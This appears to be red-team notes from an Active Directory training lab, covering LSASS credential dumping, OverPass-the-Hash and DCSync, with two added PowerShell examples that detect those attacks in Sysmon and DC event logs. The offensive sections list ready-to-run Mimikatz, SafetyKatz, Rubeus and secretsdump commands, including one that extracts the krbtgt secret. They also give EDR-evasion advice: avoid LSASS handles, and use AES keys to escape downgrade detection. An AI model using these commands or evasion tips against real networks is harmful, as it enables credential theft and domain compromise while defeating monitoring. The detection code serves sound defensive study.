Invoke-Mimikatz
DO NOT TOUCH LSASS UNLESS YOU'RE DESPERATE.
JUST OPENING A HANDLE ON IT ALERTS ANY EDR.
Search first for credentials that do not require an LSASS handle: credential vaults, browsers, the LSA secrets registry keys, and the SAM hive.
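What that EDR alert is keyed on, as an added example that is not part of the original notes: a check over Sysmon Event ID 10 (ProcessAccess) records, which log the access mask a process asked for on its target. Any handle on lsass.exe that includes PROCESS_VM_READ (0x0010), or a PROCESS_ALL_ACCESS (0x1FFFFF) handle, is the classic dump signature, so even a "quiet" tool is visible the moment it opens the handle. The event records, the image paths and the allowlist-free threshold below are constructed for this example.

```powershell
# Added example (not from the original notes): what a Sysmon/EDR ProcessAccess rule sees
# when a process opens lsass.exe. Sysmon Event ID 10 records the GrantedAccess mask.
# The events below are constructed samples, not real telemetry.

$PROCESS_VM_READ    = 0x0010     # needed to read credential material out of LSASS memory
$PROCESS_ALL_ACCESS = 0x1FFFFF   # full access, what MiniDumpWriteDump-style tools usually ask for

$sampleEvents = @(
    # benign: PROCESS_QUERY_LIMITED_INFORMATION only
    [pscustomobject]@{ SourceImage = 'C:\Windows\System32\svchost.exe';   TargetImage = 'C:\Windows\System32\lsass.exe';   GrantedAccess = '0x1000' }
    # QUERY_INFORMATION + VM_READ: enough to read LSASS memory
    [pscustomobject]@{ SourceImage = 'C:\Users\student1\SafetyKatz.exe'; TargetImage = 'C:\Windows\System32\lsass.exe';   GrantedAccess = '0x1010' }
    # PROCESS_ALL_ACCESS
    [pscustomobject]@{ SourceImage = 'C:\Windows\System32\rundll32.exe'; TargetImage = 'C:\Windows\System32\lsass.exe';   GrantedAccess = '0x1FFFFF' }
    # benign: QUERY_INFORMATION + QUERY_LIMITED_INFORMATION
    [pscustomobject]@{ SourceImage = 'C:\Windows\System32\csrss.exe';    TargetImage = 'C:\Windows\System32\lsass.exe';   GrantedAccess = '0x1400' }
    # full access to a different process: not an LSASS event
    [pscustomobject]@{ SourceImage = 'C:\Users\student1\SafetyKatz.exe'; TargetImage = 'C:\Windows\System32\notepad.exe'; GrantedAccess = '0x1FFFFF' }
)

function Test-LsassAccess {
    # Returns $true when the ProcessAccess record is a handle on lsass.exe that can read its memory.
    param([Parameter(Mandatory)] $Event)

    if ($Event.TargetImage -notmatch '\\lsass\.exe$') { return $false }

    # GrantedAccess is logged as a hex string ("0x1010"); Convert.ToInt32 accepts the 0x prefix with base 16.
    $mask = [Convert]::ToInt32($Event.GrantedAccess, 16)

    return (($mask -band $PROCESS_VM_READ) -ne 0) -or ($mask -eq $PROCESS_ALL_ACCESS)
}

$hits = $sampleEvents | Where-Object { Test-LsassAccess $_ }
$hits | Format-Table SourceImage, GrantedAccess -AutoSize
```

On the constructed input only the SafetyKatz (0x1010) and rundll32 (0x1FFFFF) records are reported; svchost and csrss query LSASS legitimately without VM_READ and stay silent. Against a live host, replace the sample array with the `EventData` of `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=10}`. Real rules add an allowlist of known AV/EDR and Windows images that read LSASS, which is exactly why the page tells you to look elsewhere first: the rule fires on the handle, not on what you do with it afterwards.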
Dumping Creds From the LSASS
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
SafetyKatz.exe "sekurlsa::ekeys"
SharpKatz.exe --Command ekeys
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump
pypykatz.exe live lsa
impacket-secretsdump Admin:[email protected]
OverPass-The-Hash
Pass-the-Hash (PTH) targets local accounts on a machine using their NTLM hash (for example, testing a local Administrator hash against other machines).
Over-Pass-the-Hash (OPTH) requests a Kerberos TGT from the Domain Controller using the account's NTLM hash or AES key. The ticket then gives access to domain-joined resources.
Always use the AES key instead of the RC4 key (the NTLM hash) to avoid flagging: a TGT requested with RC4 in a domain whose accounts support AES gets detected as an encryption downgrade.
OPTH generates logon sessions (tokens) from hashes or keys. The sekurlsa::pth variants below need elevation because they inject into LSASS.
The following commands start a new process with a logon type 9 session (the same as runas /netonly).
This means that when you access local resources on the machine you still appear as your original user (for example, whoami still returns student1). When you access resources on other domain machines, the new process uses the credentials behind the OPTH ticket instead.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /aes256:<aes256key> /run:powershell.exe"'
SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:dollarcorp.moneycorp.local /aes256:<aes256key> /run:cmd.exe" "exit"
Don't need elevation to just get the ticket:
Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash> /ptt
This needs elevation because you're spawning a new process:
Rubeus.exe asktgt /user:administrator /aes256:<aes256key> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
DCSync
Extracts credentials from the DC by asking it to replicate account secrets, without code execution on the DC.
Domain Admin, or the replication rights on the domain object (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), is required.
Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'
SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
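How the DC sees a DCSync, as an added example that is not part of the original notes: the replication request is audited as Event ID 4662 (Directory Service Access) on the DC, with the replication control-access GUIDs in the Properties field. Legitimate replication comes from the other DCs' machine accounts, so a user account exercising those rights is the signal. The events, the account names and the DC account list below are constructed for this example; the three GUIDs are the real Active Directory extended-right identifiers.

```powershell
# Added example (not from the original notes): flagging DCSync from 4662 events on a DC.
# Requires the "Audit Directory Service Access" subcategory on the DC.
# The events below are constructed samples, not real DC logs.

$ReplGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Assumption for the example: the domain's DC machine accounts. On a real DC build this
# list from the Domain Controllers group (e.g. Get-ADGroupMember 'Domain Controllers').
$dcAccounts = @('DCORP-DC$')

# Properties as it appears in the event XML: %%7688 is the "Control Access" label,
# followed by the GUIDs of the rights that were exercised.
$sample4662 = @(
    # normal DC-to-DC replication
    [pscustomobject]@{ SubjectUserName = 'DCORP-DC$'; SubjectDomainName = 'dcorp'; Properties = '%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' }
    # a user account replicating: lsadump::dcsync run as student1
    [pscustomobject]@{ SubjectUserName = 'student1';  SubjectDomainName = 'dcorp'; Properties = '%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' }
    # some other control-access right: not replication, ignored
    [pscustomobject]@{ SubjectUserName = 'student1';  SubjectDomainName = 'dcorp'; Properties = '%%7688 {bf967a86-0de6-11d0-a285-00aa003049e2}' }
)

function Find-DCSync {
    # Returns one object per 4662 event in which a non-DC account exercised replication rights.
    param([Parameter(Mandatory)] [object[]] $Events)

    foreach ($e in $Events) {
        $rights = [regex]::Matches($e.Properties, '\{([0-9A-Fa-f-]{36})\}') |
            ForEach-Object { $_.Groups[1].Value.ToLower() } |
            Where-Object { $ReplGuids.ContainsKey($_) }

        if (-not $rights) { continue }                              # not a replication request
        if ($dcAccounts -contains $e.SubjectUserName) { continue }  # expected DC-to-DC replication

        [pscustomobject]@{
            Account = "$($e.SubjectDomainName)\$($e.SubjectUserName)"
            Rights  = ($rights | ForEach-Object { $ReplGuids[$_] }) -join ', '
        }
    }
}

Find-DCSync -Events $sample4662 | Format-Table -AutoSize
```

On the constructed input only dcorp\student1 with Get-Changes and Get-Changes-All is reported. In production the exclusion list also has to cover other accounts that legitimately replicate (for example the Azure AD Connect MSOL_ account), and any account on that list is itself a DCSync target worth protecting, which is what "special permissions" above amounts to.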